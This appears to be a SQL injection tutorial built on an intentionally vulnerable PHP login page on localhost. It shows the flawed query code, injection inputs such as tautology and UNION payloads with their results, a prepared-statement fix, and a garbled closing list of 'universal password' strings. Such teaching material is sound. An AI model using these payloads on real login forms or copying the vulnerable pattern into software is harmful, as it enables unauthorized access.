1. The code
The login form (the opening form tag is not on the page and is assumed here):

```html
<form method="post" action="">
<center>
Name:<input type="text" name="user"><br>
Password:<input type="text" name="pass"><br>
<input type="submit" name="submit" value="Submit">
</center>
</form>
```

The PHP that handles the POST (deliberately vulnerable: the submitted values are concatenated straight into the SQL text; the old mysql_* functions are kept as in the original):

```php
<?php
/*************************
author: blooder
sql_injection_post
*************************/
include("../conn.php");
error_reporting(0);
if (isset($_POST['submit'])) {
    if (!empty($_POST['user']) && !empty($_POST['pass'])) {
        $user = $_POST['user'];
        $pass = $_POST['pass'];
        echo "You are currently entering the user name: " . $user . "<br>";
        echo "You are currently entering the password: " . $pass . "<br>";
        // Vulnerable by design: $user and $pass become part of the query string
        $sql = "SELECT * FROM user WHERE username='$user' AND password='$pass'";
        $res = mysql_query($sql);
        $row = mysql_fetch_array($res);
        if (empty($row)) {
            echo "<script>alert('Login failed')</script>";
        } else {
            echo "Current User:<br>";
            echo "ID: " . $row['id'] . "<br>";
            echo "Username: " . $row['username'] . "<br>";
            echo "Password: " . $row['password'] . "<br>";
        }
    } else {
        echo "<script>alert('username/password cannot be empty')</script>";
    }
} else {
    exit();
}
?>
```
2. The injection: the test page is http://localhost/pentest/sql/sql_injection_post.php
Correct input:
You are currently entering the user name: admin
You are currently entering the password: pass
Current User:
ID: 1
Username: admin
Password: pass
Try to inject:
You are currently entering the user name: 1'
You are currently entering the password: 1
Login failed
You are currently entering the user name: 1'#
You are currently entering the password: 1
Login failed
You are currently entering the user name: 1' or 1=1#
You are currently entering the password: 1
Current User:
ID: 1
Username: admin
Password: pass
Login succeeded
You are currently entering the user name: 1' or 1=2#
You are currently entering the password: 1
Login failed
Here is the principle:
The single quote closes the string literal in the WHERE clause, and the # comments out the rest of the query, including the password check. With or 1=2 the condition is always false, so no row is returned;
with or 1=1 the condition is always true, so every row is matched and the first one (admin) is returned.
You are currently entering the user name: 1' and 1=2 UNION SELECT * FROM user#
You are currently entering the password: 1
Current User:
ID: 1
Username: admin
Password: pass
If the principle here is unclear, see the first sql_injection post.
3. Anti-injection
The POSTed data must be processed before it reaches the query; a detailed explanation will follow.
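Section 3 leaves the fix unstated, so here is the same login rewritten with a mysqli prepared statement, as an added example that is not the original author's code. It assumes ../conn.php provides a mysqli connection in $conn and that the password column stores password_hash() output rather than plaintext.

```php
<?php
// Added example: the query text is fixed and the username is bound as a
// parameter, so an input like  1' or 1=1#  is looked up as a literal username
// and can never change the shape of the WHERE clause.
include("../conn.php");   // assumed to create $conn = new mysqli(...)
error_reporting(0);

if (!isset($_POST['submit'])) {
    exit();
}
$user = isset($_POST['user']) ? $_POST['user'] : '';
$pass = isset($_POST['pass']) ? $_POST['pass'] : '';
if ($user === '' || $pass === '') {
    echo "<script>alert('username/password cannot be empty')</script>";
    exit();
}

// ? is a placeholder; bind_param('s', ...) sends the raw string separately
// from the SQL text, so quotes and # in it are data, not syntax.
$stmt = $conn->prepare("SELECT id, username, password FROM user WHERE username = ?");
$stmt->bind_param('s', $user);
$stmt->execute();
$stmt->bind_result($id, $username, $hash);
$found = $stmt->fetch();
$stmt->close();

// Verify against the stored hash; the submitted credentials and the stored
// password are no longer echoed back to the browser.
if (!$found || !password_verify($pass, $hash)) {
    echo "<script>alert('Login failed')</script>";
} else {
    echo "Current User:<br>";
    echo "ID: " . htmlspecialchars($id) . "<br>";
    echo "Username: " . htmlspecialchars($username) . "<br>";
}
?>
```

With this version both 1' or 1=1# and 1' and 1=2 UNION SELECT * FROM user# from section 2 simply fail to match a user.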
4. Universal passwords via POST injection
"or" a "="a') or (' a ' = '1=1--'or ' 1=1--a' or ' 1=1--admin' or ' a ' = 'a password is random ' or 1 = 1/* user:something Pass: ' or ' 1 ' = ' one ' or ' 1 ' = ' 1admin ' or 1=1/*
SQL Injection, Part 2